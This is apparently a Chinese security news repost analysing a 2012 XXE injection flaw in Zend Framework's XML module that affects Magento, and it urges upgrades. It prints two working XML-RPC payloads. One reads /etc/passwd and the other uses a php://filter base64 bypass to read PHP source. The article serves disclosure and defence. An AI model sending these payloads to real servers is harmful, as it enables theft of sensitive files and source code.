zend framework文件读取漏洞分析
2012-07-06 22:56:51   来源:我爱运维网   评论:0 点击:

据白帽子在乌云披露,国外近期发现使用zend framework框架中存在严重安全漏洞,使用其中的xml解析模块可导致风险,导致向攻击者泄漏服务器上包括源码在内的各种敏感文件,目前已经证明多个
国外近期发现使用zend framework框架中存在严重安全漏洞,使用其中的xml解析模块可导致风险,导致向攻击者泄漏服务器上包括源码在内的各种敏感文件,目前已经证明多个开源软件和电商网站受此漏洞影响,请使用zend framework的企业和用户尽快升级。

原始的漏洞公告在: 

https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt 

这是一个典型的xml实体注射漏洞,原因与之前80sec上的警告类似 

http://www.80sec.com/xml-entity-injection.html 

据@蟋蟀哥哥 在乌云上的漏洞报告提醒,一些开源软件因为使用了zend framework的xml模块功能导致存在了问题,Magento就是其中一个典型的软件,并且已经有多个在线网店证明存在这个问题。 

原始的漏洞公告给出了测试方法: 

<?xml version="1.0"?> 
<!DOCTYPE foo [   
  <!ELEMENT methodName ANY > 
  <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> 
<methodCall> 
  <methodName>&xxe;</methodName> 
</methodCall>


但是因为真实的环境里,在读取php等文件的时候由于文件本身包含的<等字符会导致xml解析失败,于是导致读取文件失败,但在php里可以使用如下方式绕过: 

<?xml version="1.0"?> 
<!DOCTYPE foo [   
  <!ELEMENT methodName ANY > 
  <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passswd" >]> 
<methodCall> 
  <methodName>&xxe;</methodName> 
</methodCall>


 

完毕!

相关热词搜索:zend framework 漏洞

上一篇:Symantec pcAnywhere可登录名和密码字段缓冲区溢出
下一篇:网站漏洞扫描工具发布PHPmvs Beta 1.1

分享到: 收藏
评论排行